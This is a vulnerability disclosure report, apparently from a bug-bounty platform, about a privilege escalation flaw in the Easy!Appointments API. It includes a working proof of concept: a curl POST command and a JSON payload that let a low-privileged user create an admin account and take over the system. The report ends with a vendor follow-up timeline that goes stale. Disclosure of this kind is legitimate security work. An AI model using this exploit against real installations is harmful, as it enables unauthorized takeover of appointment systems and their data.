API Privilege Escalation in alextselegidis/easyappointments
Valid
Reported on
Apr 15th 2022
Description
Privilege escalation occurs when a user gets access to more resources or functionality than they are normally allowed, and such elevation or changes should have been prevented by the application. This is usually caused by a flaw in the application.
On Easy!Appointments API authorization is checked against the user's existence, without validating the permissions. As a result, a low privileged user (eg. provider) can create a new admin user via the "/api/v1/admins/" endpoint and take over the system.
Proof of Concept
curl --request POST https://easyappointments.org/index.php/api/v1/admins/ -d @payload.json --user user:pass
payload.json
{
"id": 100,
"firstName": "Admin",
"lastName": "Admin",
"email": "admin@easyappointments.org",
"mobile": null,
"phone": "111",
"address": null,
"city": null,
"state": null,
"zip": null,
"notes": null,
"timezone": "UTC",
"settings": {
"username": "usern@me",
"password": "p@ssw0rd",
"notifications": true,
"calendarView": "default"
}
}
Impact
Full system takeover.
We are processing your report and will contact the
alextselegidis/easyappointments
team within 24 hours.
a year ago
We have contacted a member of the
alextselegidis/easyappointments
team and are waiting to hear back
a year ago
We have sent a
fix follow up to the
alextselegidis/easyappointments
team.
We will try again in 7 days.
a year ago
We have sent a
second
fix follow up to the
alextselegidis/easyappointments
team.
We will try again in 10 days.
a year ago
We have sent a
third and final
fix follow up to the
alextselegidis/easyappointments
team.
This report is now considered stale.
a year ago
to join this conversation